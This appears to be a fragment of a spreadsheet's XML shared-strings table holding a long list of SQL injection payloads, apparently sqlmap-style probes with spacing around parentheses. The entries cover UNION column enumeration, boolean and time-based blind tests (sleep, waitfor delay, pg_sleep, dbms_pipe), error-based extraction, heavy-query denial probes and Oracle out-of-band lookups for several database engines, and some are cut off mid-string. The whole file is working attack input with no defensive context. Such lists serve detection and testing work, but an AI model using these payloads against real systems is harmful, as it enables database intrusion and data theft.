    <t>1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'igqm' = 'igqm</t>
  </si>
  <si>
    <t>1'  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-5507' or elt ( 1032 = 1032,3623 )  and 'ndqw' = 'ndqw</t>
  </si>
  <si>
    <t>1' where 7176 = 7176</t>
  </si>
  <si>
    <t>1%" )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  and make_set ( 8403 = 8403,8899 )  and  ( "akha" like "akha</t>
  </si>
  <si>
    <t>1' where 3425 = 3425 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1 where 7254 = 7254</t>
  </si>
  <si>
    <t>1' )  as zdhq where 5586 = 5586</t>
  </si>
  <si>
    <t>1%"  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select vupb where 9575 = 9575 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 and 8398 = 1891-- naov</t>
  </si>
  <si>
    <t>1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'fmkz' like 'fmkz</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 'pnst' = 'pnst</t>
  </si>
  <si>
    <t>1" where 1765 = 1765 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' ) </t>
  </si>
  <si>
    <t xml:space="preserve">1 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>1 )  as rsyw where 4857 = 4857 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1' where 6035 = 6035 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t xml:space="preserve">1' in boolean mode ) </t>
  </si>
  <si>
    <t>1" union all select null,null,null--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( 'juhi' like 'juhi</t>
  </si>
  <si>
    <t>1 rlike  ( select  ( case when  ( 8911 = 5301 )  then 1 else 0x28 end  )  )  # pmuh</t>
  </si>
  <si>
    <t>1%' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-1447" union all select 3013,3013,3013,3013,3013,3013,3013--</t>
  </si>
  <si>
    <t>1"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "pebw" like "pebw</t>
  </si>
  <si>
    <t>-2568" )  or  ( 8459 = 8459 ) *4906 and  ( "exyw" = "exyw</t>
  </si>
  <si>
    <t>1" )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "rphs" = "rphs</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "ikhr" = "ikhr</t>
  </si>
  <si>
    <t>1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'ulkq' = 'ulkq</t>
  </si>
  <si>
    <t>1  )  )   as ndrh where 6308 = 6308</t>
  </si>
  <si>
    <t>-7378' or 6872 = 6872 and 'bnmn' like 'bnmn</t>
  </si>
  <si>
    <t>1' )  where 1115 = 1115</t>
  </si>
  <si>
    <t>-3953 )  as wjjk where 6433 = 6433 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1 where 6304 = 6304</t>
  </si>
  <si>
    <t xml:space="preserve">1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>-3116"  )  )   )  union all select 4600,4600,4600,4600--</t>
  </si>
  <si>
    <t>-1947 union all select 7780,7780,7780,7780,7780,7780,7780,7780#</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and 'gsvt' = 'gsvt</t>
  </si>
  <si>
    <t>1'  )  )   as pdrg where 5960 = 5960 and 9198 = 9198--</t>
  </si>
  <si>
    <t>-6431"  )  )   union all select 2358,2358,2358,2358,2358,2358,2358,2358,2358,2358#</t>
  </si>
  <si>
    <t>-4319" )  where 7534 = 7534 or 8246 = 3217</t>
  </si>
  <si>
    <t>1"  )  )   as tkmd where 3415 = 3415 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>-8073  )  )   )  union all select 4481,4481,4481,4481--</t>
  </si>
  <si>
    <t>1  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  9288 = 9288</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 'subq' like 'subq</t>
  </si>
  <si>
    <t>1%" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1" )  where 8878 = 8878 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1'  )  )   as xuab where 4369 = 4369 union all select null,null,null--</t>
  </si>
  <si>
    <t>-3321" where 1603 = 1603 union all select 1603,1603,1603,1603#</t>
  </si>
  <si>
    <t>-3035" )  union all select 7912,7912,7912#</t>
  </si>
  <si>
    <t>1'  )  )   as lxjs where 6503 = 6503 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1' )  where 6092 = 6092</t>
  </si>
  <si>
    <t>-7111 union all select 2409,2409,2409,2409,2409,2409#</t>
  </si>
  <si>
    <t>-8309'|| ( select 'qecl' where 8449 = 8449 union all select 8449,8449,8449,8449,8449,8449,8449--</t>
  </si>
  <si>
    <t>-7887' )  union all select 9049,9049,9049,9049,9049,9049,9049,9049,9049,9049#</t>
  </si>
  <si>
    <t>1" )  as ltoa where 9159 = 9159 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'fmss' from dual where 7025 = 7025 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) ||'</t>
  </si>
  <si>
    <t>1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zpyx' = 'zpyx</t>
  </si>
  <si>
    <t>1'|| ( select 'hwyv' from dual where 1155 = 1155 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) ||'</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) #</t>
  </si>
  <si>
    <t>-1197"  )  )   as dfsy where 8857 = 8857 or 3038 = 3038</t>
  </si>
  <si>
    <t>1" )  as rgbz where 6687 = 6687 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1" )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "eeye" = "eeye</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and "fkdx" like "fkdx</t>
  </si>
  <si>
    <t>-1434'  )  )   union all select 4734,4734,4734,4734,4734,4734,4734,4734,4734,4734#</t>
  </si>
  <si>
    <t>1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'gzlz' like 'gzlz</t>
  </si>
  <si>
    <t>1' waitfor delay '0:0:5' and 'vwuz' = 'vwuz</t>
  </si>
  <si>
    <t>1' )  as jiic where 6158 = 6158 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  5507 = 5507</t>
  </si>
  <si>
    <t>1'|| ( select 'mgel' where 3591 = 3591 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1'+ ( select 'ngdk' where 7264 = 7264 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>1' )  as vmmk where 5757 = 5757 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 9030 = 6952 )  then 1 else 9030* ( select 9030 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>-5957  )  )   )  union all select 8485,8485,8485,8485,8485,8485,8485,8485,8485--</t>
  </si>
  <si>
    <t>1 )  union all select null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and '%' = '</t>
  </si>
  <si>
    <t>-4121%" )  union all select 2659,2659,2659,2659,2659,2659,2659,2659--</t>
  </si>
  <si>
    <t>-7422" union all select 9127,9127,9127,9127,9127,9127,9127,9127,9127,9127#</t>
  </si>
  <si>
    <t>-2745' )  or elt ( 1032 = 1032,3623 )  and  ( 'vfxq' = 'vfxq</t>
  </si>
  <si>
    <t>1%" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1" )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "ureu" like "ureu</t>
  </si>
  <si>
    <t>1"  )  )   as hzcq where 9250 = 9250 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1 )  as zodp where 9112 = 9112</t>
  </si>
  <si>
    <t>1' )  as lgex where 4068 = 4068 and 1378 = 9247--</t>
  </si>
  <si>
    <t>-9509' )  where 9303 = 9303 order by 1#</t>
  </si>
  <si>
    <t>-7008'  )  )   union all select 9080,9080,9080#</t>
  </si>
  <si>
    <t>1' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'efwq' like 'efwq</t>
  </si>
  <si>
    <t>1%' )  union all select null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'lvso' where 5675 = 5675</t>
  </si>
  <si>
    <t xml:space="preserve">-6084'  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char </t>
  </si>
  <si>
    <t>-5880'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) </t>
  </si>
  <si>
    <t>-8159 where 2793 = 2793 union all select 2793,2793,2793,2793,2793#</t>
  </si>
  <si>
    <t>1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'omlt' = 'omlt</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "jmjr" like "jmjr</t>
  </si>
  <si>
    <t>1'  )  )   waitfor delay '0:0:5' and   (  (  'bbqk' = 'bbqk</t>
  </si>
  <si>
    <t>-4480' )  where 4661 = 4661 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t>1" )  where 1700 = 1700 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1%' )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-3250%" union all select 7162,7162,7162,7162,7162,7162,7162,7162,7162--</t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>1%" rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "xmrq" = "xmrq</t>
  </si>
  <si>
    <t>1 )  as jmib where 8130 = 8130 rlike  ( select  ( case when  ( 7885 = 3932 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-3938%'  )  )   )  or 2034 = 7209#</t>
  </si>
  <si>
    <t>1'+ ( select dagm where 5461 = 5461 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) +'</t>
  </si>
  <si>
    <t>1" )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" where 5062 = 5062</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1746 = 1730,1,1/0 ) </t>
  </si>
  <si>
    <t>1' )  where 4778 = 4778 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'toxr' like 'toxr</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'leps' like 'leps</t>
  </si>
  <si>
    <t>1' where 7613 = 7613</t>
  </si>
  <si>
    <t>1" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "fqeu" like "fqeu</t>
  </si>
  <si>
    <t>select * from generate_series ( 3379,3379,case when  ( 3379 = 1219 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'imqi' = 'imqi</t>
  </si>
  <si>
    <t>1%"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  as wjty where 2971 = 2971</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 7163 = 1777 )  then 1 else 7163* ( select 7163 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' where 1673 = 1673 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-3499'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +cha</t>
  </si>
  <si>
    <t>1%" )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ||'</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2782'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 6857 = 7623 )  then 1 else 6857* ( select 6857 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  8867 = 8867</t>
  </si>
  <si>
    <t>1 where 4944 = 4944 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5970' where 2769 = 2769 union all select 2769--</t>
  </si>
  <si>
    <t>1' )  as svtm where 7627 = 7627 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1"  )  )   union all select null--</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'xpks' like 'xpks</t>
  </si>
  <si>
    <t>1%"  )  )   and sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  as epgz where 2898 = 2898 and 7028 = 2287#</t>
  </si>
  <si>
    <t>1  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 where 7642 = 7642 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>-6327'  )  )   union all select 2685--</t>
  </si>
  <si>
    <t xml:space="preserve">-9742 )  where 8409 = 8409 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>-9577'|| ( select 'vloa' from dual where 7184 = 7184 union all select 7184,7184#</t>
  </si>
  <si>
    <t>-4775' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1' and 7533 = 7533</t>
  </si>
  <si>
    <t>1%' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  'bmsa' = 'bmsa</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 8213 = 4718,1,1/0 ) </t>
  </si>
  <si>
    <t>1%' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1' )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%" and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and "psbz" = "psbz</t>
  </si>
  <si>
    <t>1 )  where 1090 = 1090 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'mjgo' where 4026 = 4026</t>
  </si>
  <si>
    <t>1  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  1260 = 1260</t>
  </si>
  <si>
    <t>1'  )  )   )  and 1743 = 6793 and   (  (   ( 'rgcv' = 'rgcv</t>
  </si>
  <si>
    <t>1" )  where 6809 = 6809 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'fven' where 1433 = 1433 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  ||'</t>
  </si>
  <si>
    <t>1 where 6044 = 6044 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'tkmc' from dual where 9675 = 9675 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1%"  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%" or elt ( 6272 = 6272,sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>-7543'  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1'  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 7594 = 8086 )  then 7594 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'nhlx' where 2291 = 2291 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>1'|| ( select 'dpje' where 2704 = 2704 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 or elt ( 6272 = 6272,sleep ( 5  )  )  # klaw</t>
  </si>
  <si>
